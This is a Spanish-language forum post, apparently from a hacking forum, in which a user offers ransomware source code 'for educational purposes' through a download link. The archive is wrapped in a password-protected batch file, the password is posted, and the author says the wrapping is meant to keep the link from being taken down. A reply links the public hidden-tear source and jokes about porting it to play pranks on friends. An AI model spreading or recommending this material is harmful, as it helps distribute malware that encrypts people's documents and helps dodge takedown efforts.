hola a todos los del foro .
hoy comparto con ustedes un Ransomware creado con "fines educativos" :silbar:
bueno cifre el code con una herramienta que cree hace unos dias muy util. para que no me tumben el link.
si les interesa la herramienta para cifrar es: Batch Archive Security
http://foro.elhacker.net/scripting/batch_aporte_batch_archive_security_ponle_contrasena_a_tus_archivos-t475058.0.html
BUENO SIN MAS QUE DECIR EL CÓDIGO DEL Ransomware :
https://mega.nz/#!8892SSYJ!X29F4hlIUTC-gWNmtL9mKWwVNOU4byyEYrE0FgeEPPc
DESCARGAN EL BATCH Y LES PEDIRA UNA CONTRASEÑA.
la contraseña es: 123456
despues presionamos enter y listo les aparecera un zip que contiene el código del Ransomware.
COMENTEN
El código fuente original del malware está público en https://github.com/goliate/hidden-tear (https://github.com/goliate/hidden-tear)
Saludos!
PD: El codigo del batch no fue analizado por lo que deberá tenerse cuidado al ejecutar este tipo de cosas. Se sugiere utilizar una VM.
Según esto https://github.com/goliate/hidden-tear esta en vb.net framework 4.5, sólo cifra los documentos de los users. Se ve simple aunque no hago malware, podría pasarse a C o Java :D , para jugarle bromas a los amigos
Saludos.